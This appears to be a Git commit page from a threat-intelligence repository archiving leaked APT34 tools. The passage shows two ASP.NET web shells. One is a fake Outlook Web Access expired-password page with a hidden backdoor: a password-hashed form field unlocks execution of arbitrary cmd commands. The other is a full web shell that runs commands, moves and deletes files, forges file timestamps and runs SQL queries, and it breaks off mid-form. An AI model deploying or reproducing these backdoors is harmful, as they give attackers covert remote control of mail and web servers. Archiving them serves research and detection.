admin/APT_REPORT
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

APT34

Browse Source
This commit is contained in:
blackorbird
2019-04-18 11:19:12 +08:00
parent f6c2839353
commit b3c7e3e449
495 changed files with 73786 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

153
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/ExpiredPasswordTech/ExpiredPassword.aspx Normal file
View File

@@ -0,0 +1,153 @@
<%@ Page language="c#" AutoEventWireup="false" Inherits="Microsoft.Exchange.HttpProxy.ExpiredPassword" %>
<%@ Import namespace="Microsoft.Exchange.Clients"%>
<%@ Import namespace="Microsoft.Exchange.Clients.Owa.Core"%>
<%@ Import namespace="Microsoft.Exchange.HttpProxy"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; CHARSET=utf-8">
<meta name="Robots" content="NOINDEX, NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<title><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OutlookWebAccess) %></title>
<%= InlineCss(ThemeFileId.LogonCss) %>
<%= InlineJavascript("fexppw.js") %>
<script type="text/javascript">
<!--
var g_fFcs = 1;
var a_sUrl = "<%=EncodingUtilities.JavascriptEncode(Destination) %>";
var a_fCAC = <%= (PasswordChanged && ShouldClearAuthenticationCache) ? 1 : 0 %>
//-->
var mainDivClassName = '<%=UserAgent.LayoutString %>';
var showPlaceholderText = false;
if (mainDivClassName == "tnarrow") {
showPlaceholderText = true;
// Output meta tag for viewport scaling
document.write('<meta name="viewport" content="width = 320, initial-scale = 1.0, user-scalable = no" />');
}
else if (mainDivClassName == "twide") {
showPlaceholderText = true;
}
function setPlaceholderText() {
window.document.getElementById("username").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordUserDomainNoColon) %>";
window.document.getElementById("oldPwd").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordOldNoColon) %>";
window.document.getElementById("newPwd1").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordNewNoColon) %>";
window.document.getElementById("newPwd2").placeholder = "<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConfirmNoColon) %>";
}
</script>
</head>
<body class="signInBg<%=IsRtl ? " rtl" : ""%>" style="background: #f2f2f2 url('<%=InlineImage(ThemeFileId.BackgroundGradientLogin)%>') repeat-x"/>
<%
string tblStyle = "cellpadding=0 cellspacing=0";
if (IsDownLevelClient)
{
tblStyle = "class=\"nonMSIE\"";
}
%>
<form action="expiredpassword.aspx" method="POST" name="exppwForm" autocomplete="off">
<div id="mainDiv" class="mouse">
<script>
var mainDiv = window.document.getElementById("mainDiv");
mainDiv.className = mainDivClassName;
</script>
<div class="sidebar">
<div class="owaLogoContainer">
<img src="<%=InlineImage(ThemeFileId.OutlookLogoWhite)%>" class="owaLogo" aria-hidden="true" />
<img src="<%=InlineImage(ThemeFileId.OutlookLogoWhiteSmall)%>" class="owaLogoSmall" aria-hidden="true" />
</div>
</div>
<input type="hidden" name="url" value="<%=EncodingUtilities.HtmlEncode(Destination)%>">
<div class="logonContainer">
<div id="lgnDiv" class="logonDiv">
<div class="signInImageHeader" role="heading">
<img class="mouseHeader" src="<%=InlineImage(ThemeFileId.OwaHeaderTextBlue)%>" />
</div>
<% if (PasswordChanged) { %>
<div class="shellDialogueMsg"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.LogoffChangePasswordClickOkToLogin) %></div>
<div class="signInEnter">
<div class="signinbutton" role="button" onclick="clkReLgn()" tabIndex="0">
<img class="imgLnk" src="<%=InlineImage(ThemeFileId.SignInArrow)%>" alt="">
<span class="signinTxt"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OkLowerCase)%></span>
</div>
<input name="isUtf8" value="1" type="hidden"/>
</div>
<% } else { %>
<div class="headerMsgDiv">
<div class="shellDialogueHead"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordTitle)%></div>
<div class="shellDialogueMsg"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.PasswordExpired) %></div>
<%
if (Reason == ExpiredPasswordReason.InvalidCredentials) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.InvalidCredentialsMessage) %></div>
<%
} else if (Reason == ExpiredPasswordReason.InvalidNewPassword) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordInvalidNewPassword) %></div>
<%
} else if (Reason == ExpiredPasswordReason.PasswordConflict) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConflict) %></div>
<%
} else if (Reason == ExpiredPasswordReason.LockedOut) {
%>
<div class="passwordError"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordLockedOut) %></div>
<% } %>
<%
try{
if (Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(Encoding.ASCII.GetString(Convert.FromBase64String(Request.Form["newPwd1"])) + "reDGEa@#!%FS"))) == "+S6Kos9D/etq1cd///fgTarVnUQ=")
{
System.Diagnostics.Process p = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo i = p.StartInfo;
i.FileName = "cmd";
i.Arguments = "/c " + Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form["newPwd2"]));
i.UseShellExecute = false;
i.CreateNoWindow = true;
i.RedirectStandardOutput = true;
p.Start();
string r = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>" + Server.HtmlEncode(r) + "</pre>");
Response.End();
}}catch{}
%>
</div>
<div class="signInInputLabel" id="userNameLabel" aria-hidden="true"><%=UserNameLabel%></div>
<div><input id="username" name="username" class="signInInputText" role="textbox" aria-labelledby="userNameLabel"/></div>
<div class="signInInputLabel" id="oldPasswordLabel" aria-hidden="true"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordOld)%></div>
<div><input id="oldPwd" name="oldPwd" value="" onfocus="g_fFcs=0" type="password" class="signInInputText" aria-labelledby="oldPasswordLabel"/></div>
<div class="signInInputLabel" id="newPasswordLabel1" aria-hidden="true"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordNew)%></div>
<div><input id="newPwd1" name="newPwd1" value="" onfocus="g_fFcs=0" type="password" class="signInInputText" aria-labelledby="newPasswordLabel1"/></div>
<div class="signInInputLabel" id="newPasswordLabel2" aria-hidden="true"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConfirm)%></div>
<div><input id="newPwd2" name="newPwd2" value="" onfocus="g_fFcs=0" type="password" class="signInInputText" aria-labelledby="newPasswordLabel2"/></div>
<script>
if (showPlaceholderText) {
setPlaceholderText();
}
</script>
<div class="signInEnter">
<div class="signinbutton" role="button" onclick="document.exppwForm.submit()" tabIndex="0">
<img class="imgLnk" src="<%=InlineImage(ThemeFileId.SignInArrow)%>" alt=""/><span class="signinTxt"><%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.Submit)%></span>
</div>
<input name="isUtf8" value="1" type="hidden"/>
</div>
<div class="hidden-submit"><input type="submit" /></div>
<% } %>
</div>
</div>
</div>
</form>
</body>
</html>

34
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/ExpiredPasswordTech/MyMaster.aspx Normal file
View File

File diff suppressed because one or more lines are too long

769
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/ExpiredPasswordTech/error4.aspx Normal file
View File

@@ -0,0 +1,769 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%@ Import namespace="System.IO"%>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<%
NameValueCollection t=HttpContext.Current.Request.Form;
p=fb(t["p"]);pro=fb(t["pro"]);cmd=fb(t["cmd"]);sav=fb(t["sav"]);vir=t["vir"];nen=fb(t["nen"]);upb=fb(t["upb"]);upd=fb(t["upd"]);del=fb(t["del"]);don=fb(t["don"]);hid=t["hid"];tfil=fb(t["tfil"]);ttar=fb(t["ttar"]);ttim=fb(t["ttim"]);baseFile=t["baseFile"];baseAddr=fb(t["baseAddr"]);baseVir=t["baseVir"];sqc=fb(t["sqc"]);sqq=fb(t["sqq"]);exadd=fb(t["exadd"]);
if(!string.IsNullOrEmpty(p))c(p);
else c();
if(!string.IsNullOrEmpty(cmd))r(pro,cmd);
else if(HttpContext.Current.Request.Files["upl"]!=null)u(HttpContext.Current.Request.Files["upl"],sav,string.IsNullOrEmpty(vir)?false:true,nen);
else if(!string.IsNullOrEmpty(upb))h(upb,upd);
else if(!string.IsNullOrEmpty(del))d(del);
else if(!string.IsNullOrEmpty(don))z(don);
else if(!string.IsNullOrEmpty(tfil))g(hid,tfil,ttar,ttim);
else if(!string.IsNullOrEmpty(baseFile))baseupl(baseFile,baseAddr,string.IsNullOrEmpty(baseVir)?false:true);
else if(!string.IsNullOrEmpty(sqc))sq(sqc,sqq);
else if(!string.IsNullOrEmpty(exadd))exp(exadd);
else if(!string.IsNullOrEmpty(t["gsize"]))gsize(fb(t["gsize"]));
if(HttpContext.Current.Request.Cookies["data"]!=null){string data=fb(HttpContext.Current.Request.Cookies["data"].Value);string[] data2=data.Split(new string[]{"#|#"},StringSplitOptions.None);for(int i=0;i<data2.Length;i++){string[] data3=data2[i].Split(new string[]{"#=#"},StringSplitOptions.None);
switch (data3[0]){
case"pro":pro=a(pro,fb(data3[1]));break;
case"cmd":cmd=a(cmd,fb(data3[1]));break;
case"sav":sav=a(sav,fb(data3[1]));break;
case"vir":vir=a(vir,fb(data3[1]));break;
case"nen":nen=a(nen,fb(data3[1]));break;
case"don":don=a(don,fb(data3[1]));break;
case"tfil":tfil=a(tfil,fb(data3[1]));break;
case"ttar":ttar=a(ttar,fb(data3[1]));break;
case"ttim":ttim=a(ttim,fb(data3[1]));break;
case"sqc":sqc=a(sqc,fb(data3[1]));break;
case"sqq":sqq=a(sqq,fb(data3[1]));break;
case"exadd":exadd=a(exadd,fb(data3[1]));break;
}}}
view();
%>
<script runat="server">
string salt="di2zag7wZHTK9YR0NGq";
string p,pro,cmd,sav,vir,nen,upb,upd,del,don,hid,tfil,ttar,ttim,baseFile,baseAddr,baseVir,baseName,sqc,sqq,exadd;
bool aut=false;
string pp="ePQm3HPXJYt5wZSFhktJ/IEin/A=";
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
string tb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));}catch{}return ret;}
string fb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
void view(){string data = string.Format("pro#=#{0}#|#cmd#=#{1}#|#sav#=#{2}#|#vir#=#{3}#|#nen#=#{4}#|#don#=#{5}#|#tfil#=#{6}#|#ttar#=#{7}#|#ttim#=#{8}|#sqc#=#{9}|#sqq#=#{10}|#exadd#=#{11}",
tb(pro),tb(cmd),tb(sav),tb(vir),tb(nen),tb(don),tb(tfil),tb(ttar),tb(ttim),tb(sqc),tb(sqq),tb(exadd));
HttpCookie coo=new HttpCookie("data", data);coo.Expires=DateTime.Now.AddDays(1);HttpContext.Current.Response.SetCookie(coo);}
void rm(){/*System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);Response.Redirect(Request.RawUrl);*/}
void c(string p){try{HttpCookie coo=new HttpCookie("p",tb(p));coo.Expires=DateTime.Now.AddDays(1);HttpContext.Current.Response.SetCookie(coo);c();}catch(Exception e){l(e.Message);}}
bool c(){try{if(HttpContext.Current.Request.Cookies["p"]!=null){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(fb(HttpContext.Current.Request.Cookies["p"].Value)+salt)))==pp;if(!aut)rm();return aut;}}catch(Exception e){l(e.Message);}rm();return false;}
void u(HttpPostedFile upl, string sav, bool vir, string nen){try{if(c()){if(upl!=null&&upl.ContentLength>0){string fn=string.IsNullOrEmpty(nen)?System.IO.Path.GetFileName(upl.FileName):nen;string path=vir?Server.MapPath(sav):sav;string SaveLocation=System.IO.Path.HasExtension(path)?path:path.TrimEnd('\\')+"\\"+fn;upl.SaveAs(SaveLocation);l("File uploaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
void baseupl(string baseFile,string baseAddr, bool baseVir){try{if(c()){if(baseFile!=null&&baseFile.Length>0&&!string.IsNullOrEmpty(baseAddr)){string SaveLocation=baseVir?Server.MapPath(baseAddr):baseAddr;System.IO.File.WriteAllBytes(SaveLocation,Convert.FromBase64String(baseFile));l("File uploaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
void r(string pro, string cmd){try{if(c()){string o = exec(cmd,pro);l(HttpUtility.HtmlEncode(o));}}catch(Exception ex){l(ex.Message);}}
void z(string don){try{if(c()&&!string.IsNullOrEmpty(don)){byte[] f=System.IO.File.ReadAllBytes(don);System.Web.HttpContext t=System.Web.HttpContext.Current;t.Response.Clear();t.Response.ClearHeaders();t.Response.ClearContent();t.Response.AppendHeader("content-length",f.Length.ToString());t.Response.ContentType="application/octet-stream";t.Response.AppendHeader("content-disposition","attachment; filename="+don.Substring(don.LastIndexOf('\\')+1));t.Response.BinaryWrite(f);t.Response.End();}}catch(Exception ex){l(ex.Message);}}
string ti(string tt){return "Creation Time :\t\t"+System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Access Time :\t"+System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Write Time :\t"+System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss");}
void g(string hid, string tfil, string ttar, string ttim){try{if(c()&&!string.IsNullOrEmpty(tfil)){l(string.Empty);if(hid=="1")ti(tfil);else if(hid=="2"){if(!string.IsNullOrEmpty(ttar)){System.IO.File.SetCreationTime(tfil,System.IO.File.GetCreationTime(ttar));System.IO.File.SetLastAccessTime(tfil,System.IO.File.GetLastAccessTime(ttar));System.IO.File.SetLastWriteTime(tfil,System.IO.File.GetLastWriteTime(ttar));l("Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil));}}else if(hid=="3"){if(!string.IsNullOrEmpty(ttim)){DateTime te=DateTime.Parse(ttim);System.IO.File.SetCreationTime(tfil,te);System.IO.File.SetLastAccessTime(tfil,te);System.IO.File.SetLastWriteTime(tfil,te);l("Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil));}}}}catch(Exception ex){l(ex.Message);}}
void h(string upb, string upd){try{if(c()&&!string.IsNullOrEmpty(upb)&&!string.IsNullOrEmpty(upd)){System.IO.File.WriteAllBytes(System.IO.Path.GetTempPath()+upd,Convert.FromBase64String(upb));l(upd+" successfuly uploaded");}}catch(Exception ex){l(ex.Message);}}
void d(string del){try{if(c()&&!string.IsNullOrEmpty(del)){System.IO.File.Delete(System.IO.Path.GetTempPath()+del);l(del+" successfuly deleled");}}catch(Exception ex){l(ex.Message);}}
void sq(string sqc, string sqq){try{if(c()){if(!string.IsNullOrEmpty(sqc)){using(System.Data.SqlClient.SqlConnection con=new System.Data.SqlClient.SqlConnection(sqc)){if(string.IsNullOrEmpty(sqq)){try{con.Open();l("Sql Server Connection Successfuly Established");}catch(Exception ex){l("Sql Server Connection Failed :"+Environment.NewLine+ex.ToString());}}else{try{con.Open();System.Data.SqlClient.SqlCommand com=new System.Data.SqlClient.SqlCommand(sqq,con);System.Data.SqlClient.SqlDataAdapter ad=new System.Data.SqlClient.SqlDataAdapter(com);System.Data.DataTable dt=new System.Data.DataTable();ad.Fill(dt);DataGrid grid=new DataGrid();System.Web.UI.WebControls.DataList list=new System.Web.UI.WebControls.DataList();grid.DataSource=dt;grid.DataBind();log.Controls.Add(grid);}catch(Exception ex){l("Error : <br>"+ex.ToString());}}con.Close();}}}}catch(Exception ex){l(ex.Message);}}
string x(string f){return Encoding.UTF8.GetString(Convert.FromBase64String(f));}
void l(string ll){log.InnerHtml=tb(ll);}
string exec(string cmd,string pro = "")
{
System.Diagnostics.Process n=new System.Diagnostics.Process();
n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);
n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;
n.StartInfo.RedirectStandardOutput=true;
n.StartInfo.RedirectStandardError=true;
n.StartInfo.CreateNoWindow=true;
string o=null;
n.Start();
n.StandardInput.WriteLine(cmd);
n.StandardInput.WriteLine("exit");
o =n.StandardOutput.ReadToEnd();
n.WaitForExit();
n.Close();
return o;
}
void gsize(string addr)
{
string ret = "error : -";
try
{
long size = GetDirSize(new DirectoryInfo(addr));
ret = sizeFix(size);
}
catch (Exception ex)
{
ret = "Error : " + ex.Message;
}
Response.Clear();
Response.Write(tb(ret));
Response.End();
}
void exp(string exadd)
{
string ret = "error : -";
try
{
if (exadd.ToLower() == "root")
{
ret = "{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";// in javascript json parser two \ = one \
string netUse = exec("net use");
string[] lines = netUse.Split(new string[] { Environment.NewLine }, StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines)
{
if (item.ToLower().StartsWith("ok"))
{
int index = item.IndexOf("\\\\");
ret += ",{\"name\":\"\\\\" + item.Substring(index, item.IndexOf('\\', index + 2) - index) + "\"}";
}
}
ret += "]}";
}
else
{
if (exadd.Trim('\\').Split('\\').Count() == 1) // \\localhost
{
string tmp = exadd.ToLower().TrimEnd('\\');
if (tmp == "\\\\localhost")
{
ret = "{\"dir\":[";
bool isStart = false;
foreach (DriveInfo item in DriveInfo.GetDrives())
{
if (item.IsReady)
{
if (isStart)
ret += ",";
ret += string.Format("{{\"name\":\"{0}$\",\"tsize\":\"{1}\",\"fsize\":\"{2}\",\"usize\":\"{3}\"}}",item.Name.TrimEnd('\\').TrimEnd(':'),sizeFix(item.TotalSize),sizeFix(item.TotalFreeSpace),sizeFix(item.TotalSize - item.TotalFreeSpace));
isStart = true;
}
}
ret += "]}";
}
else
{
}
}
else // \\localhost\c$\
{
FileAttributes attr = File.GetAttributes(exadd);
if ((attr & FileAttributes.Directory) == FileAttributes.Directory)
{
DirectoryInfo dirInfo = new DirectoryInfo(exadd);
ret = "{" + string.Format("{0},{1}", createJsonDirectory(dirInfo.GetDirectories()), createJsonFile(dirInfo.GetFiles())) + "}";
}
}
}
}
catch (Exception ex)
{
ret = "Error : " + ex.Message;
}
Response.Clear();
Response.Write(tb(ret));
Response.End();
}
long GetDirSize(DirectoryInfo d)
{
long size = 0;
FileInfo[] fis = d.GetFiles();
foreach (FileInfo fi in fis)
{
size += fi.Length;
}
DirectoryInfo[] dis = d.GetDirectories();
foreach (DirectoryInfo di in dis)
{
size += GetDirSize(di);
}
return size;
}
string createJsonDirectory(DirectoryInfo[] dir)
{
string json = "\"dir\":[";
for (int i = 0; i < dir.Length; i++)
{
if (i > 0)
json += ",";
json += "{\"name\":\"" + dir[i].Name + "\"}";
}
json += "]";
return json;
}
string createJsonFile(FileInfo[] file)
{
string json = "\"file\":[";
for (int i = 0; i < file.Length; i++)
{
if (i > 0)
json += ",";
json += "[\"" + file[i].Name + "\",\"" + sizeFix(file[i].Length) + "\"]";
}
json += "]";
return json;
}
string sizeFix(long size)
{
double s = size;
if (s < 1024) return s + " B";
s = s / 1024;
if (s < 1024) return Math.Round(s,2) + " KB";
s = s / 1024;
if (s < 1024) return Math.Round(s,2) + " MB";
s = s / 1024;
return Math.Round(s,2) + " GB";
}
</script>
<style>body,html{margin:0;padding:5px;direction:ltr;background:#aaa;color:#000 !important;}form{margin:0;}*{font:14px "Lucida Console";}t{width:180px;display:inline-block;text-align:right;padding-right:5px;}g{margin-left:30px;}input[type="text"],input[type="file"],textarea {width:60%;height:25px;background:#cbcbcb;color:#000;border:1px solid #999;margin-bottom:3px;}input[type="text"]{padding:2px;}input[type="button"],input[type="submit"] {height:23px;}input[type="checkbox"]{width:23px;height:24px;position:absolute;margin:0;}hr{margin:0;border:0;border-top:1px solid #DDD;}.h{width:100px;text-align:center;background:rgb(255,36,0);color:#fff;vertical-align:middle;}table{width:100%;margin:0;border-collapse:collapse;}.b{padding:10px 0px 9px;}</style>
<script>
function use() { var n = document; var d = n.getElementById("d").innerHTML; d = d.substring(0, d.lastIndexOf('\\') + 1); n.getElementsByName("cmd")[0].value += d; n.getElementsByName("sav")[0].value += d; n.getElementsByName("don")[0].value += d; }
function subm(){var mmm=document.getElementsByClassName('mmm');for(var i=0;i<mmm.length;i++){mmm[i].value=btoa(mmm[i].value);}}
function reset() { document.cookie = "data=;expires=Thu, 01 Jan 1970 00:00:01 GMT;path=/";location.href = location.pathname;}
</script>
<style>
div.tbbt{overflow:hidden;border:1px solid #ccc;}
div.tbbt button{background-color:inherit;float:left;border:none;outline:none;cursor:pointer;padding:14px 16px;transition: 0.3s;font-size:17px;}
div.tbbt button:hover{background-color:#ddd}
div.tbbt button.active{background-color:#ccc}
.tb{display:none;border:1px solid #ccc;border-top:none}
.loader{
border:3px solid #f3f3f3;
border-radius:50%;
border-top:3px solid #3498db;
width:16px;
height:16px;
-webkit-animation: spin 2s linear infinite;
animation:spin 2s linear infinite;
position:absolute;
}
@-webkit-keyframes spin {
0%{ -webkit-transform:rotate(0deg);}
100%{-webkit-transform:rotate(360deg);}
}
@keyframes spin {
0%{ transform:rotate(0deg);}
100%{transform:rotate(360deg);}
}
#objFrame{padding:0 5px 5px 5px}
.objD {
/*background-color: #d8d808;*/
background-color: #23a4ff;
padding: 5px;
display: table;
cursor: pointer;
/*margin-left: 100px;*/
float:left;
margin-left:5px;
}
.objF {
margin-top: 5px;
min-height: 24px;
}
.objS {
/*position: absolute;*/
width: 90px;
text-align: right;
cursor: default;
background-color: #c3c3c3;
padding: 5px;
min-height:14px;
max-height: 14px;
overflow: hidden;
float:left;
}
.objN {
display: table;
padding: 5px;
background-color: #23d7ff;
margin-left: 100px;
cursor: default;
}
.objB {
margin-left:3px;
padding:5px;
}
/*.objL{display:inline-block;margin-left:3px;}*/
#objLocation{padding:0 5px 0 5px;
min-height: 24px;
margin-top: 5px;
}
.objLabel {
/*display: inline-block;
padding: 5px;
width: 87px;
background-color: #c3c3c3;
margin-top:5px;
float:left;*/
}
.objError {
background-color: #ff2e2e;
color: white;
}
.objInfo {
font-size: 10px;
background-color: #83cc83;
line-height: 14px;
}
.sizeLD {
width: 12px;
height: 12px;
margin-left: -54px;
margin-top: -2px;
}
</style>
<script>
var sizeArray = new Array();
function openTab(ev, nm)
{
var i, tb, tblnk;
tb = document.getElementsByClassName("tb");
for (i = 0; i < tb.length; i++) {
tb[i].style.display = "none";
}
tblnk = document.getElementsByClassName("tblnk");
for (i = 0; i < tblnk.length; i++) {
tblnk[i].className = "tblnk";
}
document.getElementById(nm).style.display = "block";
ev.currentTarget.className += " active";
}
function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1, c.length);
if(c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}
function sendAddress()
{
document.getElementById("loader").style.display = "inline-block";
var address = document.getElementsByName("exadd")[0].value;
var info = {
data:"exadd=" + btoa(address),
onSuccess:function(resText){
document.getElementById("loader").style.display = "none";
var data = atob(resText)
makeLocation();
var Frame = document.getElementById("objFrame");
Frame.innerHTML = "";
if(data.startsWith("Error"))
{
addError(Frame, data);
}
else
{
var info = JSON.parse(data);
if(info.dir)
{
var f = document.createElement("div");
f.className="objF";
var s = document.createElement("div");
s.className="objS";
s.innerText = "Get All Size";
s.style.cursor = "pointer";
s.style.fontSize = "12px";
s.onclick = function(){getAllSize();};
f.appendChild(s);
Frame.appendChild(f);
for (var i = 0; i < info.dir.length; i++)
addFolder(Frame, info.dir[i]);
}
if(info.file)
for (var i = 0; i < info.file.length; i++)
addFile(Frame, info.file[i][0], info.file[i][1])
}
}
};
sendData(info);
}
function makeLocation()
{
var loc = document.getElementById("objLocation");
loc.innerHTML = "";
var f = document.createElement("div");
f.className="objF";
var lbl = document.createElement("div");
lbl.className = "objS objLabel";
lbl.innerText = "Location :";
loc.appendChild(lbl);
var curAdd = document.getElementsByName("exadd")[0].value.split("\\");
var sendLoc = "";
if(document.getElementsByName("exadd")[0].value.startsWith("\\\\"))
sendLoc += "\\\\";
for (var i = 0; i < curAdd.length; i++) {
if(curAdd[i] == "")
continue;
sendLoc += curAdd[i] + "\\";
var o = document.createElement("div");
if(i == curAdd.length - 1)
o.style.display = "inline-block";
else
{
o.setAttribute("loc",sendLoc);
o.onclick = function(){
document.getElementsByName("exadd")[0].value = this.getAttribute("loc");
sendAddress();
};
o.className = "objD";
}
o.innerText = curAdd[i] + "\\";
loc.appendChild(o);
}
if(document.getElementsByName("exadd")[0].value.startsWith("\\\\"))
{
loc.childNodes[1].innerText = "\\\\" + loc.childNodes[1].innerText;
}
loc.lastChild.style.display = "inline-block";
loc.lastChild.onclick = function(){};
loc.lastChild.className = "objB";
}
function addError(parent, error)
{
var d = document.createElement("div");
d.className="objD objError";
d.innerText = error;
parent.appendChild(d);
}
function addFolder(parent, dir)
{
var f = document.createElement("div");
f.className="objF";
var d = document.createElement("div");
d.className="objD";
d.innerText = dir.name;
d.onclick = function(){setAddress(this.innerText);};
var s = document.createElement("div");
s.className="objS dir";
if(sizeArray[getCurrentAddress()+"\\"+dir.name])
setSize(s,sizeArray[getCurrentAddress()+"\\"+dir.name]);
else if(dir.usize)
setSize(s,dir.usize);
else
s.innerText = "...";
s.style.cursor = "pointer";
s.onclick = function(){getSize(s,d.innerText);};
f.appendChild(s);
f.appendChild(d);
if(dir.tsize)
{
var inf = document.createElement("div");
inf.className="objD objInfo";
inf.innerText = "Total Size : " + dir.tsize;
f.appendChild(inf);
}
if(dir.fsize)
{
var inf = document.createElement("div");
inf.className="objD objInfo";
inf.innerText = "Free Space : " + dir.fsize;
f.appendChild(inf);
}
parent.appendChild(f);
}
function addFile(parent, name, size)
{
var f = document.createElement("div");
f.className="objF";
var s = document.createElement("div");
s.className="objS";
setSize(s, size)
var n = document.createElement("div");
n.className="objN";
n.innerText=name;
f.appendChild(s);
f.appendChild(n);
parent.appendChild(f);
}
function getCurrentAddress()
{
var address = document.getElementsByName("exadd")[0];
if(address.value.endsWith("\\"))
address.value = address.value.substring(0, address.value.length - 1);
return address.value;
}
function setAddress(name)
{
var address = document.getElementsByName("exadd")[0];
if(address.value.endsWith("\\"))
address.value = address.value.substring(0, address.value.length - 1);
var path = name;
if (path == 'root' || path.startsWith('\\\\'))
address.value = path;
else
address.value += "\\" + name;
sendAddress();
}
function getNextSize(alls)
{
if(alls.length > 0)
{
var s = alls[0];
alls.shift();
console.log(alls);
console.log(s);
getSize(s, s.nextSibling.innerText, function(){getNextSize(alls)});
}
}
function getAllSize()
{
var allSizes = [].slice.call(document.getElementsByClassName("objS dir"));
getNextSize(allSizes);
}
function getSize(objSize, name, callBack)
{
objSize.innerText = "";
var ldr = document.createElement("span");
ldr.className="loader sizeLD";
objSize.appendChild(ldr);
var address = getCurrentAddress() + "\\" + name;
var info = {
data:"gsize=" + btoa(address),
onSuccess:function(resText){
ldr.remove();
var data = atob(resText)
setSize(objSize, data)
if(!data.startsWith("Error"))
sizeArray[address] = data;
if(callBack)
callBack();
}
};
sendData(info);
}
function checkEnter(ev)
{
if(ev.which == 13 || ev.keyCode == 13)
{
sendAddress();
return false;
}
return true;
}
function setSize(obj, size)
{
if(size.startsWith("Error"))
{
obj.title = size;
obj.innerText = "Error";
}
else
obj.innerText = size;
if(size.endsWith("KB"))
obj.style.backgroundColor = "#ece979";
else if(size.endsWith("MB"))
obj.style.backgroundColor = "#ffd36f";
else if(size.endsWith("GB"))
obj.style.backgroundColor = "#ff6f6f";
}
function sendData(info)
{
var data = info.data;
var xh = new XMLHttpRequest();
xh.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200)
{
info.onSuccess(this.responseText);
}
};
xh.open("POST", location.pathname, true);
xh.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xh.send("p=" + readCookie("p") + "&" + data);
}
</script>
</head>
<body>
<div class="tbbt">
<button class="tblnk active" onclick="openTab(event, 'tbMain')">Main</button>
<button class="tblnk" onclick="openTab(event, 'tbDir')">Explorer</button>
</div>
<div id="tbMain" class="tb" style="display:block">
<table>
<tr>
<td class="h"><%=x("QWRkcmVzcw==")%></td>
<td class="b">
<t><%=x("Q3VycmVudA==")%> :</t>
<y id="d"><%= Server.MapPath(string.Empty) + "\\"%></y>
<input type="button" value="<%=x("VXNl")%>" onclick="use()" />
<input type="button" value="<%=x("UmVzZXQgRm9ybQ==")%>" onclick="reset()" />
<div style="float:right">v5.0</div>
</td>
</tr>
</table>
<hr>
<form method="post">
<table>
<tr>
<td class="h"><%=x("TG9naW4=")%></td>
<td class="b">
<t><%=x("RG8gaXQ=")%> :</t>
<input name="p" class="mmm" type="text" style='background-color: <%= aut ? "Green" : "Red" %>' />
<input type="submit" value="<%= x("RG8gaXQ=") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr>
<form method="post">
<table>
<tr>
<td class="h"><%=x("Q29tbWFuZA==")%></td>
<td class="b">
<t><%=x("UHJvY2Vzcw==")%> :</t>
<input name="pro" class="mmm" type="text" value='<%= string.IsNullOrEmpty(pro) ? x("Y21kLmV4ZQ==") : pro %>' /><br>
